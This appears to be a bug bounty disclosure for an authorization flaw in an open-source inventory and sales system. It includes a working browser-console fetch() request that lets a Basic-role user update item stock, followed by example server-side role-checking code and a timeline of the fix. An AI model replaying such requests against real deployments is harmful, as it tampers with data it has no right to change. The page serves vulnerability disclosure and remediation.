Execution with Unnecessary Privileges in amirsanni/mini-inventory-and-sales-management-system

Valid

Reported on

Jul 31st 2021


💥 BUG

Unprivileged user can update stock

💥 STEPS TO REPRODUCE

1. From the admin account, go to https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators and add a new user called user-B with the Basic role.
2. Now log in to the user-B account; user-B can't see any item.
Now user-B executes the JavaScript below in the browser console, and it will update stock

await fetch("https://1410inc.xyz/mini-inventory-and-sales-management-system/items/updatestock", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    },
    "referrer": "https://1410inc.xyz/mini-inventory-and-sales-management-system/items",
    "body": "_iId=824&_upType=newStock&qty=1&desc=New+items+were+purchasedkk",
    "method": "POST",
    "mode": "cors"
});

In this request you need to change the _iId parameter value to the item id.

💥 IMPACT

A user with the Basic role can update item stock, because the updatestock endpoint checks only that the caller is logged in and not the caller's role.
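As an added example (not the project's own code), this is the decision the server-side updatestock handler should make before touching stock: authenticate, then check the role, then validate the form body. The role names, the session shape and the allowed _upType set are assumptions; the sample body is the one from the report.

```javascript
// Added example, not the project's code: server-side authorization for
// /items/updatestock. Role names and the session shape are assumptions.
const ALLOWED_ROLES = new Set(["admin"]);           // assumed roles allowed to change stock
const ALLOWED_UPDATE_TYPES = new Set(["newStock"]); // the only _upType the report shows

// Constructed sample: the form body from the report, as user-B submitted it.
const SAMPLE_BODY = "_iId=824&_upType=newStock&qty=1&desc=New+items+were+purchasedkk";

// application/x-www-form-urlencoded -> plain object ('+' becomes a space)
function parseFormBody(raw) {
  return Object.fromEntries(new URLSearchParams(raw));
}

// Returns a decision object instead of performing the update, so the
// authorization logic can be unit-tested without a database.
function authorizeStockUpdate(session, rawBody) {
  // 1. Authentication: anonymous callers are rejected before parsing anything.
  if (!session || !session.userId) {
    return { allowed: false, status: 401, reason: "not authenticated" };
  }
  // 2. Authorization: the check the vulnerable endpoint lacked. A Basic user
  //    is rejected here even though the request itself is well-formed.
  if (!ALLOWED_ROLES.has(session.role)) {
    // Log denied attempts; a Basic user posting to updatestock is worth alerting on.
    console.warn(`denied updatestock: user=${session.userId} role=${session.role}`);
    return { allowed: false, status: 403, reason: "role not permitted to update stock" };
  }
  // 3. Input validation, reached only by a permitted role.
  const p = parseFormBody(rawBody);
  const itemId = Number(p._iId);
  const qty = Number(p.qty);
  if (!Number.isInteger(itemId) || itemId <= 0 || !Number.isInteger(qty) || qty <= 0) {
    return { allowed: false, status: 400, reason: "invalid _iId or qty" };
  }
  if (!ALLOWED_UPDATE_TYPES.has(p._upType)) {
    return { allowed: false, status: 400, reason: "unknown _upType" };
  }
  return { allowed: true, status: 200, itemId, qty, upType: p._upType, desc: p.desc ?? "" };
}
```

The role check must run on the server for every request; hiding the items page from Basic users in the UI, as the application did, does nothing once the user issues the POST directly.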

Occurrences

We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 4 months ago
amirsanni/mini-inventory-and-sales-management-system maintainer validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir confirmed that a fix has been merged on ba36f6 4 months ago
Amir has been awarded the fix bounty